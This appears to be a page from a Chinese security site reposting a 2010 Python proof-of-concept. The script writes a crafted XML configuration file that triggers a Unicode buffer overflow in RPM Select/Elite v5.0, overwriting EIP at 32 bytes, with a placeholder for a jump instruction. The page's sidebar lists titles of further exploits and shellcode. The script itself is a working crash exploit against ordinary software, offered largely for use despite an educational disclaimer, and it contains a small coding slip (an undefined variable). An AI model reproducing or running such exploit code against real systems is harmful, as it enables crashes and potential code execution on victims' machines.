首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
RPM Select/Elite v5.0 (.xml config parsing) unicode buffer overflow PoC
来源:http://www.corelan.be:8800 作者:mr_me 发布时间:2010-04-15  

#!/usr/bin/python
# ####################################################################
# RPM Select/Elite v5.0 (.xml config parsing) unicode buffer overflow PoC
# Found by: mr_me - http://net-ninja.net/
# Homepage: http://lpd.brooksnet.com/
# Download: http://www.brooksnet.com/download-rpmselect
# Tested on: Windows XP SP3
# Advisory: http://www.corelan.be:8800/advisories.php?id=10-024
# Greetz: Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
# ####################################################################
# Notes: We overwrite EIP @ 32 bytes in, and the function doesnt copy
# enough of our string to hit SEH. However modules are compiled with
# SAFESEH anyway. Combine that with unicode and the printable ascii
# limitations, we are presented with to much of a hurdle.
# ####################################################################
# How to trigger the crash:
# file -> import configuration
# Click on the queue name, then click on the imported transform
# Click 'modify transform' and b00m!
# ####################################################################
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
# Corelan does not want anyone to use this script
# for malicious and/or illegal purposes.
# Corelan cannot be held responsible for any illegal use.
#
# Note : you are not allowed to edit/modify this code. 
# If you do, Corelan cannot be held responsible for any damages.

header1 = """<RPM version="5.0.70.6">
  <Queues>
    <Queue>
      <description>lol</description>
      <seqno>0</seqno>
      <enabled>1</enabled>
      <actions>1</actions>
      <held>0</held>
      <running>0</running>
      <name>mr_mes print queue</name>
      <Transforms>
        <Transform>
          <LineWrap>0</LineWrap>
          <lfPitchAndFamily>48</lfPitchAndFamily>
          <lfOrientation>0</lfOrientation>
          <lfFaceName>
"""

header2 = """</lfFaceName>
    <lfWidth>0</lfWidth>
          <UseCharsPerInch>0</UseCharsPerInch>
          <lfItalic>0</lfItalic>
          <UseLinesPerPage>0</UseLinesPerPage>
          <lfEscapement>0</lfEscapement>
          <LinesPerInch>6.000000</LinesPerInch>
          <type>24</type>
          <LeftMargin>0.500000</LeftMargin>
          <PortraitMax>90</PortraitMax>
          <CharsPerInch>10.000000</CharsPerInch>
          <CharsPerLine>80</CharsPerLine>
          <TopMargin>0.500000</TopMargin>
          <LinesPerPage>60</LinesPerPage>
          <lfQuality>2</lfQuality>
          <lfStrikeOut>0</lfStrikeOut>
          <lfWeight>400</lfWeight>
          <FontSize>12</FontSize>
          <lfUnderline>0</lfUnderline>
          <BottomMargin>0.500000</BottomMargin>
          <Orientation>portrait</Orientation>
          <InputFormat>1252</InputFormat>
          <CalcLayout>false</CalcLayout>
          <UseLinesPerInch>1</UseLinesPerInch>
          <RightMargin>0.500000</RightMargin>
          <CtrlStrip>1</CtrlStrip>
          <UseCharsPerLine>0</UseCharsPerLine>
          <lfCharSet>1</lfCharSet>
          <lfOutPrecision>0</lfOutPrecision>
          <lfClipPrecision>0</lfClipPrecision>
          <SuppressBlankPage>1</SuppressBlankPage>
          <lfHeight>-16</lfHeight>
        </Transform>
      </Transforms>
      <Jobs />
    </Queue>
  </Queues>
  <Hosts />
</RPM>
"""

payload = "\x41" * 32
payload += "\x42\x42" # your "jmp to esp" instruction should go here
payload += "\x44" * (5000-len(buffer))
exploit = header1.rstrip() + payload.rstrip() + header2.rstrip()
try:
 f=open("cst-rpm-config.xml",'w')
 f.write(exploit)
 f.close()
 print "[+] File created successfully !"
except:
 print "[-] Error cannot write xml file to system\n"


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Mocha LPD v1.9 Remote Buffer O
·Book Library v1.4.162 Local Do
·Magneto Net Resource ActiveX v
·MovieLibrary v1.4.401 Local Do
·Sun Java Web Start Plugin Comm
·55 bytes SLoc-DoS shellcode by
·Windows ANI LoadAniIcon() Chun
·6 bytes DoS-Badger-Game shellc
·linux/x86 - execve("/bin/sh",
·25 bytes execve("/bin/sh") she
·Camiro-CMS_beta-0.1 (fckeditor
·36 bytes chmod("/etc/shadow",
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved